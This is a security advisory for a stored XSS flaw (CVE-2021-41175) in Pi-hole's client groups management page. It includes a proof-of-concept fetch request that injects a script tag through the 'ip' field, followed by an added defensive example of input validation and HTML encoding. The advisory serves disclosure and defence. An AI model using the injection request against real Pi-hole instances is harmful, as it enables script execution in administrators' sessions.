Stored XSS in Client Groups Management (Authenticated)

Low
PromoFaux published GHSA-mhr8-7rvg-8r43 Oct 23, 2021

Package

Pi-hole Web (Pi-hole)

Affected versions

< 5.7

Patched versions

None

Description

Originally reported by Robert Punnett rpunnet@bishopfox.com

Also reported by Harold Kim <@stypr>

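Stored XSS is possible when adding a client via the groups-clients management page. The `ip` parameter of the `add_client` action is stored and later rendered without encoding, as the following authenticated request shows: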

token = "csrf-token" // CSRF Token
admin_url = "http://192.168.125.129:81/admin"

fetch(admin_url + "/scripts/pi-hole/php/groups.php", {
  "headers": {
    "accept": "application/json, text/javascript, */*; q=0.01",
    "accept-language": "ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6,zh-CN;q=0.5,zh;q=0.4",
    "cache-control": "no-cache",
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
    "pragma": "no-cache",
    "x-requested-with": "XMLHttpRequest"
  },
  "referrer": "http://192.168.125.129:81/admin/groups-clients.php",
  "referrerPolicy": "strict-origin-when-cross-origin",
  "body": "action=add_client&ip=</code><script>alert(document.domain);</script>01%3A33%3AB3%3ACC%3ADA%3A46&comment=test&token=" + token,
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});
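The defensive counterpart to the request above, as an added example that is not Pi-hole's code or its patch: an allow-list check on the client identifier before it is stored, and HTML encoding when the stored value is written into the `<code>` cell. The function names and the set of accepted formats (IPv4 with optional CIDR, MAC, hostname) are assumptions made for this illustration.

```javascript
// Added example: allow-list validation plus output encoding for the client field.
// Names and accepted formats are assumptions, not taken from the Pi-hole code base.

const IPV4 = /^(25[0-5]|2[0-4]\d|1?\d?\d)(\.(25[0-5]|2[0-4]\d|1?\d?\d)){3}(\/(3[0-2]|[12]?\d))?$/;
const MAC = /^[0-9a-f]{2}(:[0-9a-f]{2}){5}$/i;
const HOSTNAME = /^(?=.{1,253}$)[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$/i;

// Input check applied before storing: every pattern is anchored, so a value
// that merely ends in a valid MAC (as in the request above) is rejected.
function isValidClientId(value) {
  if (typeof value !== "string") return false;
  return IPV4.test(value) || MAC.test(value) || HOSTNAME.test(value);
}

// Encode the five HTML-significant characters before building markup.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Output encoding applied at render time, independent of the input check,
// so rows stored before validation existed are also displayed as text.
function renderClientCell(ip) {
  return "<code>" + escapeHtml(ip) + "</code>";
}

// Constructed sample: the URL-decoded `ip` value from the request above.
const stored = "</code><script>alert(document.domain);</script>01:33:B3:CC:DA:46";

console.log(isValidClientId(stored));              // rejected at input
console.log(isValidClientId("01:33:B3:CC:DA:46")); // plain MAC accepted
console.log(renderClientCell(stored));             // markup shown as text
```

When the cell is built through the DOM rather than by string concatenation, assigning the value to `textContent` achieves the same encoding.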

Severity

Low

CVE ID

CVE-2021-41175

Weaknesses

No CWEs